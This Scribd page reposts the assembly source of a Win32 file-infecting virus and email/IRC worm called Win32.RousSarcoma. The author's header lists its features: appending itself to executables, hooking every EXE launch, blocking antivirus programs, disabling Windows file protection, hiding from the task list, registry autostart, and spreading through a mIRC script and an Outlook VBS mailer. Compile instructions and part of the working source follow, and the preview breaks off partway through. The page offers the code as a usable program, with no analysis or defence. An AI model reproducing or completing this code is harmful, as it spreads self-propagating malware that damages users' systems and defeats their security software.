Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Look up keyword
Like this
8Activity
0 of .
Results for:
No results containing your search query
P. 1
Source Email Worm.win32.Rous.A

Source Email Worm.win32.Rous.A

Ratings: (0)|Views: 153 |Likes:
Published by etiennekraemer

More info:

Published by: etiennekraemer on May 25, 2009
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

05/11/2014

pdf

text

original

 
RousSarc.asm
;;; .--------------------------------.; | |; | Win32.RousSarcoma by SnakeByte |; | SnakeByte@kryptocrew.de |; | www.kryptocrew.de/snakebyte |; .__________________________________.;;; This virus was created by the idea of coding a retro virus, which; is able too fool with some AV's. I was not able to realize all my ideas,; but I think it is some fun. This virus uses some tricks to make disinfection; harder. I came to the idea of making a virus which is able to drop itself to; the original EXE File, when I saw that most AV's do not detect the first; generation of a lot of viruses. Therefore the one part of this virus stays; undetected by heuristics. Generally this virus consits of 2 parts. The EXE File; Part and the one which is executed with an infected file. It "hooks" the execution; of every EXE File and does not execute it if it is an AV. If it is none, it gets; infected and started. Before starting the file it also checks if there is an; mirc.ini in the same path. If there is one, it drops a mirc script worm. In Addition; to this, the virus install itself in the registry to get started every time with ;windows.; It searches the registry for more paths to infect files there. If it can't find more; paths it drops a vbs script to send the worm around via Outlook.;; I am not good at writing so here is an overview of what; the virus does :;;; Name : Win32.RousSarcoma; Type : PE-Appender by increasing last section; Worming : Yes, mIRC Script and VBS Worm; Operating System : Win32; Author : SnakeByte; Payload : None, too boring to write one ;) [ Got some other interesting ;stuff; in mind i want to code as soon as possible ]; Virus Size : 8192 Bytes; Infection Mark : A-AV; Encryption : None; Autostart : RunOnce & exefiles; Anti-Bait : Does not infect files < 20000 Bytes; Anti-Debugging : Yes, against SoftIce and Int 1h tracing; Anti-AV : Yes, does not allow the execution of several AV's; disables Win2k File Protection; Anti-User : Hides itself in files & several different places,; is not shown at ctrl-alt-del list; Runs at Level : Ring-3, but still infects every EXE File on executing; Infects : 10 Files in the current directory,; 10 Files in every path stored in this registry Key :; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App ;Paths; Every EXE File which gets executed;; How to compile ( TASM 5.0 ) :;; tasm32 /z /ml /m3 RousSarc,,;; tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib; pewrsec RousSarc.EXE;; ( Make sure that the .EXE is uppercases !! );; At the moment there are just 100 Bytes of Code i could add, with the file staying; at 8192 Bytes. If I would add more, the file would grow to 12 KB. I decided to
 
RousSarc.asm
; keep it small and leave stuff out like encryption or even poly. Maybe it could; be optimized on several parts to make it fit with encryption to a 8 KB file,; but I don't mind at the moment;;;; Thanks and greetz to :;; Lord Arz : Did you also finish your EXEFILES "hooking" something ? ;); DukeCS : Heh, when will KC be done ? *fg*; Matsad : Sorry, for not coming, but i got no cash and need to see my girlfriend ;:P; Lethal Mind : Heh, where are you ? ;(; Ciatrix : Nice that you carry on !;;;; ***************************************************************************; ------------------------[ Let's get ready to rumble ]----------------------; ***************************************************************************.586p.modelflatjumps; calculate Jumps.radix16; Hexadecimal numbers; define some API'sextrnExitProcess:PROC; Host for EXE-Part extrnLoadLibraryA:PROC; nessesairy to get all other API's in the EXE-Part extrnGetProcAddress:PROC; cause I don't want DLL not found error's extrnMessageBoxA:PROC; for testing .code; Some constantsVirusSizeequ8192d; Lenght of EXE-File ImageBaseequ400000h; Imagebase of our TASM generated EXE-File CPart1equ600hGap1equ0A00h; ###########################################################################; -------------------[ This is the first part of the virus ]-----------------; ###########################################################################Virus:; Here do we search for EXE-files and put the; entire PE-Virus EXE to the end !; we search for the needed api's with GetProcAdress; and LoadModuleHandle, so we will not get Problems; with missing DLL's or API'smovebp,'VA-A'; place a mark in ebp, to identify this part leaeax,KERNEL32; push name of kernel32.dll pusheaxcallLoadLibraryA; save Handlemovdwordptr[K32Handle],eax testeax,eax; if we failed we stop here jzFirstGenHostleaesi,Kernel32Names; get all API's we need from kernel leaedi,XFindFirstFileA movebx,K32Handle
 
RousSarc.asm
pushNumberOfKernel32APISpopecxcallGetAPI3; the procedure is needed in both partsleaeax,advname; push name of advapi32.dll pusheaxcallLoadLibraryA; save Handlemovdwordptr[ADVHandle],eax testeax,eax; if we failed we stop here jzFirstGenHostleaesi,AdvapiNames; get all API's we need from kernel leaedi,XRegOpenKeyExA movebx,ADVHandle pushNumberOfAdvapiAPISpopecxcallGetAPI3; the procedure is needed in both parts; Lets hide our Application from the CTRL-ALT-DEL List,; to prevent us from being detected by a suspicious user ;); Check if the API is availablecmpdwordptr[XRegisterServiceProcess],0 jeNoHide; Get ID of our processcalldwordptr[XGetCurrentProcessId] push1; We want to run as a servicepusheax; process idcalldwordptr[XRegisterServiceProcess] NoHide:; ***************************************************************************; ---------------------------[ Initialisation ]------------------------------; ***************************************************************************; Lets do a check on our commandline params,; to see, if we got startet with a filename; in it --> exefile methodcalldwordptr[XGetCommandLineA] movdwordptr[CmdLine],eax ; the start of the commandline is in eax,; we will parse it to the .exe part to see; if there is anything afterwardsCommandReceive1:cmpdwordptr[eax],'EXE.' jeCommandOK1inceaxjmpCommandReceive1CommandOK1:addeax,4h; eax points directly after the <name>.exe cmpbyteptr[eax],0; if the Commandline ends here, we do not need jeSetRunOnceKey; to care about this ;)addeax,2h; skip blanc and " movesi,eax; save it movdwordptr[SaveBlanc],esi

Activity (8)

You've already reviewed this. Edit your review.
1 hundred reads
1 thousand reads
omaraje liked this
shiyasha liked this
shiyasha liked this
maxinzard liked this
maxinzard liked this

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->